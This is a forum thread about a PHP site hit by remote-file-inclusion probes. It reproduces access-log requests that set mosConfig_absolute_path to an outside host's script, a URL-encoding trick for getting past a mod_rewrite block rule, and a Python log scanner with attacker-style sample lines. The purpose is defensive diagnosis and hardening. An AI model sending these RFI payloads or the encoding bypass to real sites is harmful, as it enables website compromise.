gevans Posted November 3, 2009

Hey guys,

One of my sites has been compromised, causing Google results to show the wrong title/description. From what I can tell I've got off lightly, as the attack enabled them access to all the files on the server. The main problem seems to be via mosConfig_absolute_path. Does anyone have any information on this, and prevention?

The access log is as follows:

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141855 "-" "Mozilla/5.0"

This is a first for me, and I'm not 100% sure what's going on. So any information on what's happening, and how, would be greatly appreciated.

Cheers,
gevans

Link to comment: https://forums.phpfreaks.com/topic/180105-mosconfig_absolute_path/
Daniel0 Posted November 3, 2009

Try grepping the access log for that IP address and see what turns up. Also, what kind of scripts are you running?
PFMaBiSmAd Posted November 3, 2009

What does a phpinfo() statement show for register_globals?
gevans Posted November 3, 2009 (Author)

> Try grepping the access log for that IP address and see what turns up. Also, what kind of scripts are you running?

It's a website with a CMS and separate blog, the CMS feeding the main pages of the site. All the attacks have been done via the front end (as far as I can tell). The following are all the access log lines containing that IP in the last month:

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141943 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141868 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 142043 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"
example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141855 "-" "Mozilla/5.0"

> What does a phpinfo() statement show for register_globals?

Register globals are off.
Daniel0 Posted November 3, 2009

I would research the things in this file. It would seem like an RFI attack. This file is obviously harmless, but I suppose it could be used to probe for vulnerable websites.
gevans Posted November 3, 2009 (Author)

The end result of the attack left a few files on the server. When search engines indexed the home page it was showing the wrong title/description, but the site itself worked as expected. I'll take a look at that file now.
gevans Posted November 3, 2009 (Author)

This is the most useful page I've found on the matter so far:

http://fightskillz.com/2009/07/hack-attempts-by-idiots/

Trying to figure out the best course of action to take. The best option so far seems to be as simple as this:

> To return HTTP status 404 (Not Found) and an error page if the query string starts with _SERVER[DOCUMENT_ROOT]= try this in .htaccess file, but be careful not to break the rest of the .htaccess file and get server error. In this example the URL of your site's custom error page is error404.html. I suppose you already have somewhere in your .htaccess file
>
> RewriteEngine on
> RewriteBase /
>
> and add somewhere below the following
>
> # square brackets are regex metacharacters, so they must be escaped to match literally
> RewriteCond %{QUERY_STRING} ^_SERVER\[DOCUMENT_ROOT\]=
> RewriteRule ^$ /error404.html [NC,L]

If you have any further recommendations please let me know.

Cheers,
gevans
Daniel0 Posted November 3, 2009

Have a look at Tom's tutorial: http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite
gevans Posted November 3, 2009 (Author)

As simple as that? Adding:

# Stop naughty RFI attacks
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
# ^.*$ rather than ^(.+)$ so the rule also fires for the site root, whose
# per-directory path is empty (the 200s in the log above are all root requests)
RewriteRule ^.*$ - [F]

to my htaccess file? If I've missed something let me know. If not, thanks a lot!

Cheers,
gevans
PFMaBiSmAd Posted November 3, 2009

Unfortunately, you can use URL encoded characters to get around that method: %48ttp will be seen as Http in the php code doing the include statement.
gevans Posted November 3, 2009 (Author)

Do you have any other methods you would recommend instead of/as well as the htaccess rewrite?
PFMaBiSmAd Posted November 3, 2009

Yes, simple: allow_url_include should be off (and if you are not yet using php5, where allow_url_include was added, you should be). All external data cannot be trusted and must be validated to ensure it contains only expected values.
gevans Posted November 3, 2009 (Author)

Everything that's passed to the site is getting validated as far as I can tell. I am on php5, and allow_url_include is off.
PFMaBiSmAd Posted November 3, 2009

Then remote file inclusion is not how they are getting access to your site, and the requests in the logs with a URL as a value are just probing attempts to find if your script allows remote file inclusion.
Daniel0 Posted November 3, 2009

> Unfortunately, you can use URL encoded characters to get around that method - %48ttp will be seen as Http in the php code doing the include statement.

Hmm... seems like the query string doesn't get decoded, but the rest does, using mod_rewrite. How annoying.
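As an added example (not from the thread or from Tom's tutorial), a small Python log scanner that applies the check the way PHP sees it: it URL-decodes each query-string value before looking for a remote scheme, so `%48ttp` is caught where the literal `http://` RewriteCond above would miss it, and it also flags register_globals-style parameter names such as mosConfig_absolute_path. The log lines, IP addresses and the remote hostname are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (vhost, IPs and remote host are placeholders).
# Line 1 mirrors the probe shape from the thread, line 2 is the %48ttp encoding
# variant PFMaBiSmAd warns about, line 3 is an ordinary page request.
SAMPLE_LOG = """\
example.co.uk 203.0.113.5 - - [13/Oct/2009:15:25:42 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/x.txt?? HTTP/1.1" 200 141855 "-" "Mozilla/5.0"
example.co.uk 203.0.113.5 - - [13/Oct/2009:15:26:01 +0100] "GET /index.php?mosConfig_absolute_path=%48ttp%3A%2F%2Fattacker.example%2Fx.txt%3F%3F HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
example.co.uk 198.51.100.9 - - [13/Oct/2009:15:27:10 +0100] "GET /about-us.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# vhost, client IP, timestamp, request target and status from a combined-format line
LOG_RE = re.compile(r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# What the literal mod_rewrite pattern sees: a scheme spelled out in the raw query string
NAIVE_RE = re.compile(r'(https?|ftp)://')
# What PHP sees after decoding: a value that is a URL, whatever its case or encoding
SCHEME_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)
# Parameter names that only make sense as register_globals / RFI probes
PROBE_PARAMS = {'mosConfig_absolute_path', 'GLOBALS', '_REQUEST', '_SERVER'}

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%2548ttp -> %48ttp -> Http) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, status, naive_hit, decoded_hit, probe_params), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m['target'].partition('?')[2]             # everything after the first '?'
    pairs = parse_qsl(query, keep_blank_values=True)  # one decoding round happens here
    naive_hit = bool(NAIVE_RE.search(query))
    decoded_hit = any(SCHEME_RE.match(fully_decode(v)) for _, v in pairs)
    probes = sorted({k.split('[')[0] for k, _ in pairs} & PROBE_PARAMS)
    return m['ip'], int(m['status']), naive_hit, decoded_hit, probes

def scan(log_text):
    """Keep only requests carrying a remote URL in a value or a known probe parameter."""
    rows = (classify(l) for l in log_text.splitlines() if l.strip())
    return [r for r in rows if r and (r[3] or r[4])]

for ip, status, naive, decoded, probes in scan(SAMPLE_LOG):
    print(f'{ip} status={status} literal={naive} decoded={decoded} probes={probes}')
```

The second sample line comes back with literal=False but decoded=True, which is exactly the gap between the RewriteCond and what include() ends up seeing; a status of 200 on such a request is what to go and look at.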
gevans Posted November 3, 2009 (Author)

> Then remote file inclusion is not how they are getting access to your site and the requests in the logs with a URL as a value are just probing attempts to find if your script allows remote file inclusion.

Ok, I'm following. So if these 'probes' return a positive result for the attack, they can run a more comprehensive (nastier) script to 'attack' the site?
PFMaBiSmAd Posted November 3, 2009

If you request your script using the whole request string like what is in the log (I would change the actual URL in it to a known safe .txt file on your server), what do you get? There could be other ways that request string is bypassing something in your script.

> One of my sites have been compromised, causing google results to show the wrong title/description. From what I can tell I've got off lightly as the attack enabled them access to all the files on the server.

What exactly is getting changed on your site? A file? Contents in a database? How do you know someone had access to all the files on the server?
gevans Posted November 3, 2009 (Author)

> If you request your script using the whole request string like what is in the log (I would change the actual URL in it to known safe .txt file on your server), what do you get?

The main pages are called directly (about-us.php), though there is a Movable Type blog built into the site.

> What exactly is getting changed on your site? A file? Contents in a database? How do you know someone had access to all the files on the server?

A line was added to the index.php file including a file that had been added to a folder in my directory. There were about 4 files added in total.
PFMaBiSmAd Posted November 3, 2009

Either someone has figured out one of your passwords that allows access to the files; you have a file upload feature (perhaps for an avatar or for a specific file upload) that allowed a .php file to be placed onto the server that was then browsed to; your admin section of a script is not actually preventing the remainder of code on the admin page(s) from being executed and someone used your admin script to modify your files; or you have some code using eval() (they should have spelled that evil()) that allowed some php code to be executed that was posted as content that is being displayed.
gevans Posted November 3, 2009 (Author)

Thanks for that. All the passwords have been changed (if that was the problem). The admin area does have an upload available, but this is restricted to PDFs and images. I don't personally have code using eval(), but some of the files found on the server are using it. I'll have to keep a close eye on the server logs.